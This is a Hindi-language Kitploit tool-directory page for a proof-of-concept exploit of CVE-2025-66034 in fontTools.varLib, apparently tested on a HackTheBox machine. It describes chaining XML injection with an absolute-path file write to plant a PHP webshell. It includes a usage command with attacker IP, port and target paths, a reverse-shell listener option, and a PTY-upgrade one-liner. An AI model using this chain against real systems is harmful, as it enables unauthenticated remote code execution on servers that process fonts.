Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-66034 — CVE-2025-66034 - fontTools varLib Arbitrary File Write → RCE fontTools.varLib में Arbitrary File Write + XML Injection कमजोरी के लिए PoC शोषण। | Kitploit
उपकरण/GitHubGitHub/4nuxd/cve-2025-66034
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHub4nuxd/cve-2025-66034

CVE-2025-66034

CVE-2025-66034 - fontTools varLib Arbitrary File Write → RCE fontTools.varLib में Arbitrary File Write + XML Injection कमजोरी के लिए PoC शोषण।

रिपॉजिटरी देखें
25 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-66034 — fontTools varLib मनमाना फ़ाइल लेखन → RCE

fontTools.varLib में मनमाना फ़ाइल लेखन + XML इंजेक्शन भेद्यता के लिए PoC शोषण HackTheBox — VarIaType पर परीक्षित


भेद्यता

fontTools.varLib .designspace XML फ़ाइलों को प्रोसेस करके वेरिएबल फॉन्ट बनाता है। दो कमजोरियां मिलकर प्री-ऑथ RCE प्राप्त करती हैं:

#प्राथमिक तत्वविवरण
1CDATA स्प्लिट के माध्यम से XML इंजेक्शन<labelname> के अंदर हमलावर-नियंत्रित सामग्री को आउटपुट फ़ॉन्ट फ़ाइल बॉडी में शाब्दिक रूप से लिखा जाता है, जिससे मनमाना डेटा इंजेक्शन संभव होता है
2os.path.join() बाईपास के माध्यम से मनमाना फ़ाइल लेखन<variable-font> का filename गुण एक निरपेक्ष पथ स्वीकार करता है। जब os.path.join() को पास किया जाता है, तो यह इच्छित आउटपुट निर्देशिका को छोड़ देता है और किसी भी हमलावर-निर्दिष्ट फ़ाइलसिस्टम पथ पर लिखता है

दोनों प्राथमिक तत्वों को श्रृंखलाबद्ध करने से PHP वेबशेल को वेब-सुलभ पथ पर लिखा जा सकता है, जिससे अप्रमाणित रिमोट कोड निष्पादन प्राप्त होता है।


उपयोग

root@kitploit:~
python3 font_varlib.py \
  --ip <attacker-ip> \
  --port <port> \
  --upload http://target.htb/tools/variable-font-generator/process \
  --webroot /var/www/portal.target.htb/public/files \
  --shell http://portal.target.htb/files

विकल्प

फ़्लैगविवरण
--ipरिवर्स शेल कॉलबैक के लिए हमलावर IP
--portश्रोता पोर्ट
--uploadफ़ॉन्ट प्रोसेसिंग एंडपॉइंट का पूरा URL (POST)
--webrootसर्वर-साइड निरपेक्ष पथ जो वेब-सुलभ निर्देशिका में मैप करता है
--shellआधार URL जिसके अंतर्गत वेबशेल सुलभ होगा
--no-listenऑटो-लिसनर को छोड़ें — इसके बजाय मैनुअल कमांड प्रिंट करें
--pwncatnc के बजाय pwncat-cs का उपयोग करें (यदि उपलब्ध हो तो प्राथमिकता)

निर्भरताएँ

root@kitploit:~
pip install requests fonttools

यह कैसे काम करता है

  1. मास्टर फ़ॉन्ट — डिज़ाइनस्पेस के लिए आवश्यक मास्टर्स के रूप में fontTools.FontBuilder का उपयोग करके दो न्यूनतम .ttf फ़ाइलें (source-light.ttf, source-regular.ttf) उत्पन्न की जाती हैं
  2. दुर्भावनापूर्ण .designspace — एक तैयार XML फ़ाइल निम्नलिखित के साथ बनाई जाती है:
    • <labelname> के अंदर CDATA स्प्लिट के माध्यम से PHP वेबशेल इंजेक्ट किया जाता है
    • निरपेक्ष लेखन पथ को <variable-font> के filename के रूप में सेट किया जाता है, os.path.join() के माध्यम से output_dir को बायपास करते हुए
  3. अपलोड — .designspace + मास्टर फ़ॉन्ट प्रोसेसिंग एंडपॉइंट पर POST किए जाते हैं
  4. ट्रिगर — लगाई गई .php फ़ाइल का अनुरोध किया जाता है, जो रिवर्स शेल पेलोड को निष्पादित करती है
  5. TTY अपग्रेड — कनेक्शन पर, स्क्रिप्ट स्वचालित रूप से python3 -c 'import pty; pty.spawn("/bin/bash")' के माध्यम से एक PTY उत्पन्न करती है और पूरी तरह से इंटरैक्टिव शेल के लिए TERM + stty सेट करती है

प्रकटीकरण

क्षेत्र
CVECVE-2025-66034
प्रभावित घटकfontTools.varLib
प्रभावअप्रमाणित मनमाना फ़ाइल लेखन → रिमोट कोड निष्पादन
संदर्भवेब एप्लिकेशन जो फ़ॉन्ट प्रोसेसिंग एंडपॉइंट को उजागर करता है

कानूनी

यह उपकरण केवल अधिकृत पैठ परीक्षण और CTF उपयोग के लिए है। उन सिस्टमों पर न चलाएं जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति नहीं है।


4nuxd द्वारा

टूल डाउनलोड करें